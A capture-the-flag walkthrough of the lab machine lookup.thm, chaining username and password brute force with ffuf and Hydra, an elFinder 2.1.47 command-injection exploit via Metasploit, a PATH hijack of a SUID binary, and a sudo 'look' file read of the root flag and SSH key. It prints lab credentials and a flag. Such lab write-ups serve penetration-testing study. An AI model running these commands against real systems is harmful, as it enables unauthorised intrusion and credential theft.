Chained Exploitation on lookup.thm: Web Vuln - SUID - Sudo Bypass

This is a complete walkthrough of the lookup.thm machine, showcasing all stages from reconnaissance to privilege escalation. The box features a vulnerable web application, weak credentials, command injection via a known PHP file manager, and insecure binary configuration allowing multiple layers of privilege escalation. Let’s dive into the full exploitation path.

Reconnaissance

We always start with scanning the target for open ports and services. Here, we used Nmap with aggressive scan options and full port coverage:

nmap -sV -sC -T4 -p- 10.66.167.223

Explanation of flags:

• -sV: Enables version detection to identify software running on open ports.
• -sC: Runs default NSE scripts for common vulnerability checks.
• -T4: Speeds up the scan by adjusting timing (safe for most environments).
• -p-: Scans all 65535 TCP ports instead of just the top 1000.

Nmap discovered:

• Port 22/tcp: SSH (OpenSSH 8.2p1)
• Port 80/tcp: HTTP (Apache 2.4.41)

The HTTP server seemed to redirect to another domain. A quick inspection of HTTP headers or the browser showed a redirection to http://lookup.thm, indicating virtual hosting is in place. This is a common setup on multi-site servers where a domain name is required to serve proper content.

To ensure proper name resolution, we appended an entry in /etc/hosts like so:

echo "10.66.167.223 lookup.thm" >> /etc/hosts

After this, browsing to http://lookup.thm revealed a login page with basic username and password fields — a clear candidate for brute-force testing.

Web Enumeration & Credential Discovery

Since the login page did not expose any registration or password reset functionality, we proceeded with a brute-force attack to enumerate valid usernames. We used ffuf, which is a fast and efficient web fuzzer widely used for this purpose.

ffuf -w /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames-dup.txt \
  -X POST -d "username=FUZZ&password=x" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -u http://lookup.thm/login.php -fs 74

Here, -fs 74 filters by response size. The idea is that failed logins will return a fixed-sized response (e.g., error message), while successful or partially valid credentials will result in a different response size.

Eventually, this revealed the following valid usernames:

• jose
• admin

The next step was to brute-force passwords for these users. Given the popularity of the RockYou wordlist, we used it with Hydra:

hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form \
  "/login.php/:username=^USER^&password=^PASS^:wrong password. please try again."

Hydra automates the process of sending HTTP POST requests using given credentials and detects successful logins based on a known failure message or size difference.

After a few minutes, the correct login credentials were found:

Username: jose
Password: password123

This gave us authenticated access to the web application.

Web Application Access & Vulnerability Identification

Upon logging in as jose, we were taken to a file manager interface. A closer inspection revealed that the web application was using elFinder 2.1.47, a popular file management tool written in PHP and JavaScript.

We quickly checked Exploit-DB using searchsploit:

searchsploit elFinder 2.1.47

This revealed a known vulnerability:

elFinder 2.1.47 - 'PHP connector' Command Injection | php/webapps/46481.py

This vulnerability targets the exiftran command in the PHP backend connector. If unfiltered, this input can lead to command injection — giving us shell access.

Instead of manually exploiting the vulnerability, we used the ready-to-go Metasploit module. In msfconsole:

use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
set RHOSTS 10.66.167.223
run

This successfully opened a Meterpreter session, which gave us remote command execution under the context of the web server, typically www-data.

Post-Exploitation: From www-data to think

Now in Meterpreter, we dropped into a shell for classic enumeration:

shell

A quick look around the file system (ls -la, pwd, etc.) showed we were in the elFinder PHP directory: /var/www/files.lookup.thm/public_html/elFinder/php

We started investigating users and home directories. In /home/think/, we noticed a .passwords file owned by root:think:

-rw-r----- 1 root think  525 Jul 30 2023 .passwords

As www-data, we had no read access. So we searched for privilege escalation vectors.

Discovering a SUID Binary

Using the standard technique to find binaries with the SUID bit set:

find / -perm -4000 -type f 2>/dev/null

Among the usual system binaries, one unusual entry stood out:

/usr/sbin/pwm

Upon execution:

/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

This confirmed that it executed the id command without using an absolute path, making it vulnerable to PATH hijacking.

We exploited this by planting a fake id binary in /tmp:

cat << 'EOF' > /tmp/id
#!/bin/bash
echo "uid=33(think) gid=33(think) groups=33(think)"
EOF
chmod +x /tmp/id
export PATH=/tmp:$PATH

Now, our custom id script would be run when /usr/sbin/pwm is executed. After confirming with which id → /tmp/id, we re-executed the binary:

/usr/sbin/pwm

This time it detected the spoofed user ID think and printed a long list of passwords. This was likely hardcoded or retrieved based on id output.

We saved the output as a wordlist and used it to brute-force SSH login as think:

hydra -l think -P /root/Desktop/passwords ssh://10.66.167.223

Hydra identified valid credentials:

Username: think
Password: josemario.AKA(think)

Privilege Escalation: think to root

With valid credentials, we logged in over SSH:

ssh think@10.66.167.223

We enumerated possible privilege escalation paths. sudo -l revealed:

User think may run the following commands:
  (ALL) /usr/bin/look

The binary look is normally used to match strings in a sorted file. In other words, it’s a small and typically harmless utility that simply searches a wordlist or dictionary file for entries starting with a given string. In this context, the term "benign" means the tool is not considered dangerous or privileged under normal circumstances.

However, GTFOBins notes that if a user can run it with elevated privileges, and the file being read is under root’s control, it may leak sensitive content line by line.

We confirmed that running it with sudo and an empty search string allowed us to read protected files:

sudo /usr/bin/look "" /root/root.txt

This displayed the root flag:

5a285a9f257e45c68bb6c9f9f57d18e8

At this point, the box was fully rooted.

Alternatively, one could also try to search for root’s private SSH key to obtain more persistent and interactive root access. This key is typically found at:

/root/.ssh/id_rsa

If readable (via the same look trick), it can be saved locally, permissions set with chmod 600, and used like this:

ssh -i id_rsa root@10.66.167.223

This method not only confirms full control but also allows full root login outside the restricted context of sudo commands.

Summary

Conclusion

This machine is an excellent example of multiple chained misconfigurations:

• Weak web authentication + brute-force potential
• Use of vulnerable third-party software (elFinder)
• SUID binary with unqualified system command execution
• sudo misconfiguration allowing privileged file reads

Each stage offered practical techniques for real-world penetration testers: credential attacks, RCE via PHP apps, path hijacking, and sudo misuses. A solid learning experience for anyone studying privilege escalation paths in Linux environments.

Full compromise achieved. This machine demonstrates classic web application misconfiguration, insecure file handling, SUID abuse, and sudo misconfiguration in a very instructive sequence.